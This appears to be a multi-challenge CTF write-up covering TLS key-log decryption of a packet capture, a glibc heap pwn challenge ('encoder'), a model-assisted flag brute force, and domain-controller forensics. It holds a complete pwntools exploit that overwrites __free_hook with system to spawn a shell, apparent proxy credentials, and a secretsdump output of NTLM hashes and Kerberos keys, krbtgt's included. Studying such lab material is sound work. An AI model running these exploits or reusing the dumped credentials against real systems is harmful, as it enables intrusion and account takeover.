5G Message

The capture was analysed with CTF-NetA; decrypting its TLS traffic requires a tls.keylog file.

The TCP streams contain plaintext.

Several streams carry the contents of a keylog file.

Concatenating the fragments gives:

```
# sslkeylog

SERVER_HANDSHAKE_TRAFFIC_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 994da7436ac3193aff9c2ebaa3c072ea2c5b704683928e9f6e24d183e7e530386c1dcd186b9286f98249b4dc90d8b795
EXPORTER_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 31882156a3212a425590ce171cb78068ee63e7358b587fed472d45d67ea567d98a079c84867a18665732cf0bfe18f0b0
SERVER_TRAFFIC_SECRET_0 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 1fbf7c07ca88c7c91be9cce4c9051f2f4bd7fb9714920661d026119ebab458db8637089348dd5a92dc75633bdcf43630
CLIENT_HANDSHAKE_TRAFFIC_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 a98fab3039737579a50e2b3d0bbaba7c9fcf6881d26ccf15890b06d723ba605f096dbe448cd9dcc6cf4ef5c82d187bd0
CLIENT_TRAFFIC_SECRET_0 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 646306cb35d94f23e125225dc3d3c727df65b6fcec4c6cd77b6f8e2ff36d48e2b7e92e8f9188597c961866b3b667f405
```

Re-analyse the TLS traffic with the key log loaded

PNG data appears in the decrypted stream

Save the data as an image

This gives the flag: abcdef1234567890deadbeefc0ffeeba

Decrypting the TLS traffic with Wireshark

Import the sslkeylog file

Filter on TLS; an HTTP response carrying a PNG image is visible
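As an added example (not code from the write-up), the Python below reassembles key-log fragments and validates the result before it is handed to a decryptor: every entry must have the NSS label / client-random / secret shape, all secrets for one client random must have the same length (which also tells you which hash the negotiated suite uses), and the four TLS 1.3 traffic secrets must be present or only part of the conversation will decrypt. The key material is the page's; the fragment split offsets are constructed.

```python
import re
from collections import defaultdict

# Added example, not part of the original write-up: reassemble key-log fragments and
# validate them before loading the file into Wireshark or CTF-NetA.
CLIENT_RANDOM = "9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1"
KEYLOG_TEXT = (
    "# sslkeylog\n"
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {CLIENT_RANDOM} 994da7436ac3193aff9c2ebaa3c072ea2c5b704683928e9f6e24d183e7e530386c1dcd186b9286f98249b4dc90d8b795\n"
    f"EXPORTER_SECRET {CLIENT_RANDOM} 31882156a3212a425590ce171cb78068ee63e7358b587fed472d45d67ea567d98a079c84867a18665732cf0bfe18f0b0\n"
    f"SERVER_TRAFFIC_SECRET_0 {CLIENT_RANDOM} 1fbf7c07ca88c7c91be9cce4c9051f2f4bd7fb9714920661d026119ebab458db8637089348dd5a92dc75633bdcf43630\n"
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {CLIENT_RANDOM} a98fab3039737579a50e2b3d0bbaba7c9fcf6881d26ccf15890b06d723ba605f096dbe448cd9dcc6cf4ef5c82d187bd0\n"
    f"CLIENT_TRAFFIC_SECRET_0 {CLIENT_RANDOM} 646306cb35d94f23e125225dc3d3c727df65b6fcec4c6cd77b6f8e2ff36d48e2b7e92e8f9188597c961866b3b667f405\n"
)
# The page's key log split at constructed offsets, as if carved from three TCP streams.
FRAGMENTS = [KEYLOG_TEXT[:150], KEYLOG_TEXT[150:500], KEYLOG_TEXT[500:]]

# NSS key log entry: <LABEL> <client_random: 32 bytes hex> <secret hex>
LINE_RE = re.compile(r"^(?P<label>[A-Z0-9_]+) (?P<random>[0-9a-fA-F]{64}) (?P<secret>[0-9a-fA-F]+)$")

# Labels a decryptor needs to see both directions of a TLS 1.3 connection.
TLS13_REQUIRED = {
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0",
}
# Secret length equals the handshake hash length: 32 bytes for SHA-256 suites, 48 for SHA-384.
HASH_LEN_TO_NAME = {32: "SHA-256", 48: "SHA-384"}


def reassemble(fragments):
    """Fragments are joined in stream order; a split inside a line is healed by the join."""
    return "".join(fragments)


def parse_keylog(text):
    """Return {client_random: {label: secret_bytes}}, skipping comments and blank lines.
    A malformed line raises so a corrupt fragment is noticed rather than silently dropped."""
    sessions = defaultdict(dict)
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not an NSS key log entry: {line[:40]!r}")
        sessions[m["random"].lower()][m["label"]] = bytes.fromhex(m["secret"])
    return dict(sessions)


def check_session(secrets):
    """Report what a decryptor can do with the secrets recorded for one client random."""
    lengths = {len(s) for s in secrets.values()}
    if len(lengths) != 1:
        raise ValueError(f"inconsistent secret lengths {sorted(lengths)}")
    (hash_len,) = lengths
    missing = TLS13_REQUIRED - secrets.keys()
    return {
        "hash": HASH_LEN_TO_NAME.get(hash_len, f"unknown ({hash_len} bytes)"),
        "complete": not missing,
        "missing": sorted(missing),
        "exporter": "EXPORTER_SECRET" in secrets,
    }


if __name__ == "__main__":
    for client_random, secrets in parse_keylog(reassemble(FRAGMENTS)).items():
        print(client_random[:16], check_session(secrets))
```

The 96-hex-character secrets on this page decode to 48 bytes, so the session negotiated a SHA-384 suite; all four traffic secrets are present, which is why both the request and the PNG response decrypt.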

encoder - attack

64-bit, all protections enabled

A menu challenge implementing a simple file manager with the following functions:

  1. upload
  2. download
  3. encode
  4. decode
  5. release

encode run-length encodes the file and prepends a header: "RLE\n", the encoded length, and a checksum

```c
memcpy(ptr, "RLE\n", sizeof(_DWORD));                                  // magic at bytes 0-3
ptr[1] = v5;                                                           // encoded length at bytes 4-7
*(_DWORD *)((char *)ptr + v5 + 8) = sumBytes((__int64)(ptr + 2), v5);  // checksum over the encoded data, stored right after it
```

decode decodes a file produced by encode but only validates the header. By forging the header we can overwrite the size field of the adjacent heap chunk, and release then lets us leak libc and reach __free_hook.
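To make the missing check concrete, here is an added Python model of the encode/decode format (not the challenge's code). The header layout, "RLE\n", a u32 length, the data and a u32 byte-sum checksum, follows the decompiled snippet; the run layout, (count, value) byte pairs, is an assumption because the binary's run format is not shown. The decoder checks the declared length against the bytes actually received and computes the decoded size before writing anything, which is exactly the validation a header-only check leaves out.

```python
import struct

# Added example (not the challenge binary's code). Header layout follows the decompiled
# encode(): "RLE\n" | u32 encoded length | encoded data | u32 checksum (byte sum).
# The run layout, (count, value) byte pairs, is an assumption.
MAGIC = b"RLE\n"
HEADER = struct.Struct("<4sI")     # ptr[0] magic, ptr[1] length
CHECKSUM = struct.Struct("<I")     # stored at ptr + 8 + length


def sum_bytes(data):
    """The decompilation's sumBytes(): a plain byte sum truncated to a DWORD."""
    return sum(data) & 0xFFFFFFFF


def rle_encode(raw):
    """Encode raw as (count, value) pairs with count capped at 255, then wrap in the header."""
    runs = bytearray()
    i = 0
    while i < len(raw):
        j = i
        while j < len(raw) and raw[j] == raw[i] and j - i < 255:
            j += 1
        runs += bytes((j - i, raw[i]))
        i = j
    return HEADER.pack(MAGIC, len(runs)) + bytes(runs) + CHECKSUM.pack(sum_bytes(runs))


def rle_decode(blob, capacity):
    """Decode blob into a buffer of `capacity` bytes, or raise ValueError.

    Every field the header claims is checked against what was really received or
    really allocated before any byte is written; a header-only check (magic and
    checksum) would accept a length that points past the end of the chunk."""
    if len(blob) < HEADER.size + CHECKSUM.size:
        raise ValueError("blob shorter than header plus checksum")
    magic, length = HEADER.unpack_from(blob)
    if magic != MAGIC:
        raise ValueError("bad magic")
    available = len(blob) - HEADER.size - CHECKSUM.size
    if length > available:
        raise ValueError(f"declared length {length:#x} exceeds received data {available:#x}")
    if length % 2:
        raise ValueError("run data must be whole (count, value) pairs")
    runs = blob[HEADER.size:HEADER.size + length]
    (checksum,) = CHECKSUM.unpack_from(blob, HEADER.size + length)
    if checksum != sum_bytes(runs):
        raise ValueError("checksum mismatch")
    decoded_size = sum(runs[0::2])            # known before writing anything
    if decoded_size > capacity:
        raise ValueError(f"decoded size {decoded_size:#x} exceeds buffer capacity {capacity:#x}")
    out = bytearray()
    for count, value in zip(runs[0::2], runs[1::2]):
        out += bytes((value,)) * count
    return bytes(out)


if __name__ == "__main__":
    sample = b"A" * 300 + b"BC" + b"\x00" * 5
    blob = rle_encode(sample)
    assert rle_decode(blob, 0x200) == sample
    forged = blob[:4] + (0x500).to_bytes(4, "little") + blob[8:]   # length field inflated
    try:
        rle_decode(forged, 0x200)
    except ValueError as err:
        print("rejected:", err)
```

The two size checks are independent: the declared length bounds how far the checksum read and the copy go inside the input chunk, and the decoded size bounds the output buffer, so a header whose run counts add up to more than the destination can hold is refused before the first byte is written.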

Exploitation

malloc a forged chunk that will overflow into the neighbouring chunk's size field, then malloc a few small chunks; once decode of the forged chunk has enlarged that size, an unsorted-bin attack leaks libc.

Overwrite the fd pointer with __free_hook-0x8; the next allocation lands at __free_hook-0x8, so __free_hook can be set to system and triggered to spawn a shell.

exp

```python
from pwn import *
import sys
import socks
import socket

# route the connection through a SOCKS5 proxy
socks.set_default_proxy(
    socks.SOCKS5,
    "8.kernel.ccsssc.hunau.edu.cn",
    27335,
    username="dmp1mowm",
    password="teossw4o"
)
socket.socket = socks.socksocket
context(arch='amd64', os='linux', log_level='debug')

challenge = "./encoder"
def debug():
    gdb.attach(io)
    pause()

def dbg():
    context.log_level = 'debug'

def echo(content):
    print("\033[4;36;40mOutput prompts:\033[0m" + "\t\033[7;33;40m[*]\033[0m " + "\033[1;31;40m" + content + "\033[0m")

def upload(idx,data):
    sla(b">>", b"1")
    sla(b"Idx:",str(idx).encode())
    sla(b"Size:",str(len(data)).encode())
    sa(b"Data:",data)
def download(idx):
    sla(b">>", b"2")
    sla(b"Idx:",str(idx).encode())
def free(idx):
    sla(b">>", b"5")
    sla(b"Idx:",str(idx).encode())
def decode(idx):
    sla(b">>", b"4")
    sla(b"Idx:",str(idx).encode())
def calc_sum(data):
    total = 0
    for i in data:
        total += i
    return total

def exp():
    # forged chunk for decode
    payload = b"RLE\n"
    payload += p32(1)+b'\xff'
    payload += p32(0x500)
    payload += p32(0xffffff00) + p8(0xa)
    payload += b'\x00'*(0x48-9)
    payload += p16(0x4f1)
    payload = payload.ljust(0x7f,b'\x00')
    upload(0,payload)
    upload(1,b"1"*0x100)
    upload(2,b"2"*0x48)
    upload(3,b"3"*0x18)
    upload(4,b"4"*0x28)
    upload(5,b"5"*0x18)
    upload(6,b"6"*0x18)
    upload(7,(p64(0)+p64(0x21))*(0x500//2))
    free(2)
    decode(0) # overflow
    free(3)
    upload(3,b"3"*0x18)
    download(4)
    libc_base = uu64(ru(b'\x7f')[-6:]) - 0x1ecbe0
    echo("libc_base: "+hex(libc_base))
    libc = ELF("./libc-2.31.so")
    system = libc_base + libc.symbols['system']
    free_hook = libc_base + libc.symbols['__free_hook']
    free(6)
    free(5)
    # overwrite __free_hook
    payload = b'\x00'*0x28+p64(0x21)+p64(free_hook-0x8)
    upload(8,payload)
    #debug()
    upload(9,b"9"*0x18)
    #debug()
    upload(10,b"/bin/sh\x00"+p64(system)+p64(0))
    debug()
    free(10)

local = int(sys.argv[1])
elf = ELF(challenge)

context.terminal=["cmd.exe","/c", "start", "cmd.exe", "/c", "wsl.exe", "-e"]

if local:
    io = process(challenge)
else:
    # connect to the remote server through the proxy
    io = remote("192.0.100.2", 8888)

p = lambda : pause()
s = lambda x : success(x)
re = lambda m, t : io.recv(numb=m, timeout=t)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
sd = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
ia = lambda : io.interactive()
sla = lambda a, b : io.sendlineafter(a, b)
sa = lambda a, b : io.sendafter(a, b)
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))

exp()
ia()
```

ez_sight

Known-plaintext attack on the archive

Use the provided password.pt model to classify the images

```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from PIL import Image
import torchvision.transforms as transforms
import glob

class SimpleCNN(nn.Module):
    def __init__(self):
        super(SimpleCNN, self).__init__()
        self.conv1 = nn.Conv2d(1, 16, kernel_size=3, padding=1)   # 1 input channel, 16 output channels
        self.conv2 = nn.Conv2d(16, 32, kernel_size=3, padding=1)  # 16 input channels, 32 output channels
        self.fc1 = nn.Linear(32 * 7 * 7, 128)  # fully connected layer 1
        self.fc2 = nn.Linear(128, 62)          # fully connected layer 2; assumes 62 classes (0-9, a-z, A-Z)

    def forward(self, x):
        x = F.relu(self.conv1(x))   # activation
        x = F.max_pool2d(x, 2)      # pooling layer 1
        x = F.relu(self.conv2(x))   # activation
        x = F.max_pool2d(x, 2)      # pooling layer 2
        x = x.view(x.size(0), -1)   # flatten
        x = F.relu(self.fc1(x))     # activation
        x = self.fc2(x)             # output layer
        return x

# Load the model. weights_only=False unpickles arbitrary Python objects from the file,
# so only load .pt files you trust; the SimpleCNN class above must be defined for the
# pickled model object to be restored.
model = torch.load('password.pt', weights_only=False)
model.eval()  # evaluation mode


print(model)


transform = transforms.Compose([
    #transforms.Grayscale(num_output_channels=1),  # convert to greyscale
    transforms.ToTensor(),                         # convert to tensor
    transforms.Normalize(mean=[0.5], std=[0.5])    # normalise
])

image_files = sorted(glob.glob('*.bmp'))
for idx, img_file in enumerate(image_files):
    image = Image.open(img_file)
    image = transform(image).unsqueeze(0)

    with torch.no_grad():
        output = model(image)
        probabilities = F.softmax(output, dim=1)
        top_prob, top_indices = torch.topk(probabilities, 10)  # the ten most likely classes

    print(f"\n图片 {idx + 1}: {img_file}")
    for i in range(10):
        prob = top_prob[0][i].item()     # probability
        pred = top_indices[0][i].item()  # predicted class
        print(f" 预测类别 {i + 1}: {pred}, 概率: {prob:.4f}")
```

Take the few most probable digits at each position and brute-force the combinations

```python
import uuid
import hashlib

# candidate digits per position, ordered by model probability
possible_digits = [
    [8,0,9,3,5,2],
    [1,7],
    [8,2,1],
    [3,9,5,8],
    [4,5,1,9,7,8,3],
    [6,5,8,4],
    [5,6,8],
    [8,9,7,1,0],
    [8,3],
    [9,8,3],
    [9,4,7],
    [8,0,3],
    [8,2,5,7,4,1,9],
    [4,5,7]
]

target_hash = "115159c751ddf16c527ee96f998ed55ed8a3302f2fd04ba60682493883901684"

def generate_flags(index, current_flag):
    # depth-first over the candidate lists; stop at the first flag whose SHA-256 matches
    if index == 14:
        final_flag = "dart{" + str(uuid.uuid3(uuid.UUID('11341600-1542-4ee8-b148-23940f18186b'), current_flag)) + "}"
        sha256_hash = hashlib.sha256(final_flag.encode("utf8")).hexdigest()
        if sha256_hash == target_hash:
            print(current_flag)
            print("Correct flag found:", final_flag)
            return True
        return False
    for digit in possible_digits[index]:
        if generate_flags(index + 1, current_flag + str(digit)):
            return True
    return False

generate_flags(0, "")
```

Solved.

DC-Forensics-1

Check the certificate authority logs

  • Look at the Windows event logs on the CA server, in particular Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
  • Look for suspicious certificate issuance events

Check the certificate database

  • Look at the CA database files (by default under %SystemRoot%\System32\CertLog)
  • Use certutil to query the issued certificates

The CA database file is found under Windows\System32\CertLog

Export the file and open it in ESEDatabaseView

The third record is the certificate we are looking for

MyTem-5400000003eedab5344b2e5da5000000000003

DC-Forensics-2

Check the antivirus logs

  • Look at the quarantine/detection logs of Windows Defender, Symantec or whichever product is installed
  • Usually under C:\ProgramData\Microsoft\Windows Defender\Quarantine or the product's own directory

Check the Windows event logs

  • Open Event Viewer

    • Method 1: GUI

      Win+R, type eventvwr.msc and press Enter, or go to Control Panel > Administrative Tools > Event Viewer

    • Method 2: command line

      wevtutil qe Security /rd:true /f:text /q:"*[System[(EventID=4688)]]"

    • Key log locations

      • Security log (Security)

        Path: Windows Logs > Security

        Important event IDs:

        **4624**: successful logon
        **4625**: failed logon
        **4672**: special privileges assigned (e.g. administrator)
        **4688**: process creation
        **4697**: service installed
        **4703**: token right adjusted

      • System log (System)

        Path: Windows Logs > System

        Watch for abnormal service starts, driver loads and similar

      • Application log (Application)

        Antivirus logs usually end up here

      • Service-specific logs

        Under Applications and Services Logs > Microsoft > Windows:

        PowerShell/Operational (Event ID 4103-4104)

        Sysmon/Operational (if configured)

        Windows Defender/Operational

Search the whole disk for "defender" to find the .evtx file

Open the evtx file; the upload path of the trojan is C:\Users\Public\e9caab4405a14fb6.exe

DC-Forensics-3

DC-Forensics-4

Check the security log for account creation events

In security.evtx look for Security Group Management entries

Key event IDs:

  • 4720: user account created
  • 4726: user account deleted
  • 4728: member added to a security-enabled global group
  • 4732: member added to a security-enabled local group

Search the whole disk for evtx files

Open it in Event Viewer and filter on event 4728 to find the group name and user name: maintainer, James
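As an added example (not part of the write-up), the Python below parses event records in the Windows event XML schema, the form Event Viewer and wevtutil export, and applies two triage rules from the sections above: a 4720 account creation followed within a time window by a 4728 addition to a security-enabled global group, and a 4688 process start from a user-writable staging directory. The records are constructed; the domain name and timestamps are made up, while the account, group and binary path are the ones found on this page.

```python
import xml.etree.ElementTree as ET
from datetime import datetime

# Added example, not from the original write-up: parse Security-log event XML and run
# two triage rules over it. All records below are constructed sample data.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Directories a legitimate service binary is rarely launched from; tune per environment.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")


def make_event(event_id, system_time, data):
    """Build a minimal record in the Windows event XML schema (used only to construct samples)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{system_time}"/></System>'
            f'<EventData>{fields}</EventData></Event>')


# Constructed sample: an account is created, added to a security-enabled global group,
# and a binary is then started from C:\Users\Public (the path the write-up found).
# The domain "corp.local" and the timestamps are made up.
SAMPLE_XML = [
    make_event(4720, "2025-03-20T10:00:00.0000000Z",
               {"SubjectUserName": "Administrator", "TargetUserName": "James"}),
    make_event(4728, "2025-03-20T10:05:00.0000000Z",
               {"MemberName": "CN=James,CN=Users,DC=corp,DC=local", "TargetUserName": "maintainer"}),
    make_event(4624, "2025-03-20T10:07:00.0000000Z",
               {"TargetUserName": "James", "LogonType": "10"}),
    make_event(4688, "2025-03-20T10:08:00.0000000Z",
               {"SubjectUserName": "James", "NewProcessName": r"C:\Windows\System32\notepad.exe"}),
    make_event(4688, "2025-03-20T10:10:00.0000000Z",
               {"SubjectUserName": "James", "NewProcessName": r"C:\Users\Public\e9caab4405a14fb6.exe"}),
]


def parse_time(system_time):
    # SystemTime carries 100 ns fractions; whole seconds are enough for correlation.
    return datetime.strptime(system_time.split(".")[0].rstrip("Z"), "%Y-%m-%dT%H:%M:%S")


def parse_event(xml_text):
    """Flatten one <Event> into a dict: EventID, Time, plus every <Data Name=...> field."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    record = {
        "EventID": int(system.find("e:EventID", NS).text),
        "Time": parse_time(system.find("e:TimeCreated", NS).get("SystemTime")),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        record[data.get("Name")] = data.text or ""
    return record


def load_events(xml_records):
    """Parse and sort by time so correlation can walk the records in order."""
    return sorted((parse_event(x) for x in xml_records), key=lambda r: r["Time"])


def suspicious_process_creations(events):
    """4688 events whose image path sits in a user-writable staging directory."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4688:
            continue
        path = ev.get("NewProcessName", "")
        if any(d in path.lower() for d in SUSPICIOUS_DIRS):
            hits.append(path)
    return hits


def correlate_account_lifecycle(events, window_seconds=3600):
    """Pair a 4720 (account created) with a 4728 (added to a security-enabled global
    group) for the same account within window_seconds; returns [(user, group), ...]."""
    created = {}  # user -> creation time
    pairs = []
    for ev in events:
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"]] = ev["Time"]
        elif ev["EventID"] == 4728:
            # MemberName is a distinguished name; the first RDN is the account's CN.
            member = ev["MemberName"].split(",")[0].removeprefix("CN=")
            if member in created and (ev["Time"] - created[member]).total_seconds() <= window_seconds:
                pairs.append((member, ev["TargetUserName"]))
    return pairs


if __name__ == "__main__":
    evs = load_events(SAMPLE_XML)
    print("new accounts placed in groups:", correlate_account_lifecycle(evs))
    print("processes from staging dirs:", suspicious_process_creations(evs))
```

On a real export the XML comes from `wevtutil qe Security /f:xml` or from an EVTX parser; the same two functions apply unchanged because the field names (TargetUserName, MemberName, NewProcessName) are those of the native events.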

Find ntds.dit in the Windows\NTDS folder and extract the hashes of every domain user with Impacket

 34405@Warmlight D:\....\examples  master  python .\secretsdump.py -system "C:\Users\34405\Desktop\SYSTEM" -ntds "C:\Users\34405\Desktop\ntds.dit" LOCAL
Impacket v0.13.0.dev0+20250326.105809.0711a41e - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8044866ff95b2378568f795d988d1d3e
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f3be9e9410d93545451f65dcf50188a4
[*] Reading and decrypting hashes from C:\Users\34405\Desktop\ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f0e42db02cf933707a4aa3575bab3b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
john:1000:aad3b435b51404eeaad3b435b51404ee:4b679d47454b3bf0ba434d62c09ba644:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:dbe46b92afe60335e751c96f6c4d7810:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:13fcb179f2788c599b27c0cefc445562:::
CLIENT$:1104:aad3b435b51404eeaad3b435b51404ee:c4d288a337abeb621ebb12e40ddf67c9:::
Hannah:3102:aad3b435b51404eeaad3b435b51404ee:9b1d28539cc145c85086f38776169fea:::
Joshua:3103:aad3b435b51404eeaad3b435b51404ee:db03e6daa244825c00d3f7e294d27d6f:::
Isabella:3104:aad3b435b51404eeaad3b435b51404ee:82d1759cdeb5c8725fc8e7788b83e426:::
Kevin:3105:aad3b435b51404eeaad3b435b51404ee:599ed14dfebb2ec097ca628f49e1d423:::
Amber:3106:aad3b435b51404eeaad3b435b51404ee:cf6925a3afed551ed10a5419da377a95:::
Lillian:3109:aad3b435b51404eeaad3b435b51404ee:d3de8712ca56c72eebed117d3565873a:::
Blake:3110:aad3b435b51404eeaad3b435b51404ee:f469f6426abb7f7cb5e8844d4ca76523:::
Samantha:3112:aad3b435b51404eeaad3b435b51404ee:8dedf5bc821230e586b5c21035970744:::
Nicole:3113:aad3b435b51404eeaad3b435b51404ee:dfa885e9a64b5c0384288ffcdc8659e1:::
Logan:3114:aad3b435b51404eeaad3b435b51404ee:838fd57bf783bb09991ae4712131864f:::
Jessica:3116:aad3b435b51404eeaad3b435b51404ee:d095ea11af14fcf4669e76c684d6ec49:::
Charlotte:3117:aad3b435b51404eeaad3b435b51404ee:029123a5809a5c0d2447188266dab17f:::
Francis:3120:aad3b435b51404eeaad3b435b51404ee:6e9c54e1ef0ef8a26d86cbab01686d14:::
Brittany:3124:aad3b435b51404eeaad3b435b51404ee:96f3648994ddb91648ac7b461ba7540e:::
Aaron:3125:aad3b435b51404eeaad3b435b51404ee:1e18c5b51df4e3e2a04cab4a2ddcc606:::
Emily:3126:aad3b435b51404eeaad3b435b51404ee:8f0d151425872dc248b8af7159f24579:::
Katherine:3128:aad3b435b51404eeaad3b435b51404ee:cb809cb896174cf6faf9a2a791bd9d86:::
Nathan:3133:aad3b435b51404eeaad3b435b51404ee:21be91e8953da8ad0513df5a5552e803:::
Bethany:3134:aad3b435b51404eeaad3b435b51404ee:406caf707b7bd627f29f097762fc17cb:::
Derek:3135:aad3b435b51404eeaad3b435b51404ee:a22e1a8440d6d8beb7a77a18edc72c42:::
Abigail:3136:aad3b435b51404eeaad3b435b51404ee:a7e1a39cd7c7f40c1bf2d61baf69e302:::
Daniel:3137:aad3b435b51404eeaad3b435b51404ee:12f1eac19900aae4f5692bfa7ed55fa7:::
Ashley:3142:aad3b435b51404eeaad3b435b51404ee:f030c60a6bba9829fc26a4e4d0707f40:::
Emma:3144:aad3b435b51404eeaad3b435b51404ee:0363dee43a91a09cbf413259bb1a997e:::
Brandon:3145:aad3b435b51404eeaad3b435b51404ee:cb5183ecb944dd2f9d9ffda4666699ee:::
Laura:3146:aad3b435b51404eeaad3b435b51404ee:7912be0e7e04010d855b5aaac0652b21:::
George:3147:aad3b435b51404eeaad3b435b51404ee:5c27498c56f7da5eba7c536f2d4c4c0e:::
Harper:3148:aad3b435b51404eeaad3b435b51404ee:de4e876e5628791377184d233ece9b2f:::
Matthew:3149:aad3b435b51404eeaad3b435b51404ee:1ac5e256431fa8982db64af20d4554f2:::
Benjamin:3151:aad3b435b51404eeaad3b435b51404ee:8bd9a7cf8167c7ae09b2e296f11bf3cd:::
Leah:3153:aad3b435b51404eeaad3b435b51404ee:4245664d67e5b0b8db11abdd0a135908:::
Elizabeth:3159:aad3b435b51404eeaad3b435b51404ee:775689673a62a33cb35117d93c6b8aed:::
Connor:3160:aad3b435b51404eeaad3b435b51404ee:aaaa411583594936b88bbcfbc713bec8:::
Angela:3162:aad3b435b51404eeaad3b435b51404ee:1854c60dc8265016521fcd64007e6ec1:::
Aiden:3165:aad3b435b51404eeaad3b435b51404ee:329b3015e8205a3add613062fd0b49f1:::
Julia:3171:aad3b435b51404eeaad3b435b51404ee:35447ece3cf29380cdf229ed556ad626:::
Charles:3172:aad3b435b51404eeaad3b435b51404ee:fdf77af33704f0f5b9d2d49ef978ac85:::
Adrian:3173:aad3b435b51404eeaad3b435b51404ee:db8ed3ef3d6ef1e9b7e9bab493176a0b:::
Liam:3174:aad3b435b51404eeaad3b435b51404ee:8eadd9d479600d1cb9b51a063dfa298b:::
Brooke:3176:aad3b435b51404eeaad3b435b51404ee:959acd2731022f135ae87c27f15783a6:::
Alan:3177:aad3b435b51404eeaad3b435b51404ee:5603b7c6420640265f9eb7be684241ed:::
Ella:3178:aad3b435b51404eeaad3b435b51404ee:763ecdade02a78f952c71814a0e70c62:::
Caleb:3179:aad3b435b51404eeaad3b435b51404ee:576619eb3d35633613b0581425d74a6f:::
Noah:3180:aad3b435b51404eeaad3b435b51404ee:28a05da8b680cd692c44d78b4789e10f:::
Donald:3181:aad3b435b51404eeaad3b435b51404ee:d9d7c8ac83b284a3c0ab191c31e4e8e0:::
Alexander:3183:aad3b435b51404eeaad3b435b51404ee:c71320f068bd82730c1e8a6e86d9872e:::
Austin:3184:aad3b435b51404eeaad3b435b51404ee:9e9a8992851d382126d798af0f7d4eca:::
Michelle:3187:aad3b435b51404eeaad3b435b51404ee:805a51f35bcfa168ae3c328b9279e70b:::
Adam:3188:aad3b435b51404eeaad3b435b51404ee:e0c59c48452659eb5a885158d725e1e2:::
Isaiah:3189:aad3b435b51404eeaad3b435b51404ee:b37e1f03a36b28bed2bcef6aa492412d:::
Anthony:3191:aad3b435b51404eeaad3b435b51404ee:4ac6515bfd3ea713140a4c2e18922d85:::
mary:3192:aad3b435b51404eeaad3b435b51404ee:1e5f261cdec77428aaa79a0ba5c133af:::
James:3193:aad3b435b51404eeaad3b435b51404ee:9fc8c6b0ac495fa52039ab6e0276a3c3:::
[*] Kerberos keys from C:\Users\34405\Desktop\ntds.dit
Administrator:aes256-cts-hmac-sha1-96:b4973e980f1126987cf91525d4d97db242d308c314a0c11afa7b3d486faa742f
Administrator:aes128-cts-hmac-sha1-96:866294af0f0a844c77fab4bd5eca9dc7
Administrator:des-cbc-md5:89256d1c02a2b0ba
john:aes256-cts-hmac-sha1-96:2a6743e85897a8880c484aecc0d39700f9aa0c980a8e99ac50489bb553c4ede4
john:aes128-cts-hmac-sha1-96:15346b18cc86078657e6a1555d3e70a0
john:des-cbc-md5:ba540eb094fd04c1
DC$:aes256-cts-hmac-sha1-96:bd90739c9265896a17f387d6e23da294391927b7b9d0f18296d2351904c8721f
DC$:aes128-cts-hmac-sha1-96:b6363a1fe42f1e9a2bbedaf4ef066430
DC$:des-cbc-md5:adef34f4ea7f73da
krbtgt:aes256-cts-hmac-sha1-96:c19ba00f164b26796050ecb884d5f7e13ba0aae086c7486f64660be3d6ff39e9
krbtgt:aes128-cts-hmac-sha1-96:e2e6c395b9b8d172cfb0a42998a233c7
krbtgt:des-cbc-md5:70835157b375df62
CLIENT$:aes256-cts-hmac-sha1-96:f66e981944d3a1650d14d2f9e1b593ed780cf4ee505132aa44cb1ce4b24c5839
CLIENT$:aes128-cts-hmac-sha1-96:10e1b55dbf25099ed30572de6ecee205
CLIENT$:des-cbc-md5:404fcbb67afd5dc1
Hannah:aes256-cts-hmac-sha1-96:f5dfd1876831f3b913965eab3d8af711453b151ba510a81e2431819e011cafa1
Hannah:aes128-cts-hmac-sha1-96:f36eb5f85770dc9af7e4ba9e0854b25e
Hannah:des-cbc-md5:b62ccbd0ab9e25e5
Joshua:aes256-cts-hmac-sha1-96:b430e1c3ac7bd4be593fd51d55e7bbb1953203013f7177e009a1d9da1b516f26
Joshua:aes128-cts-hmac-sha1-96:49890ebe537ae6401af4a3209426f4f1
Joshua:des-cbc-md5:5d4f94ea38a4d525
Isabella:aes256-cts-hmac-sha1-96:f4e36f7525971ee7948ece86656ff3644e1762dfaa2e5e045735de04badd71ff
Isabella:aes128-cts-hmac-sha1-96:b192a765dc7d3b12183081328c66581f
Isabella:des-cbc-md5:c85b23e65761b6e3
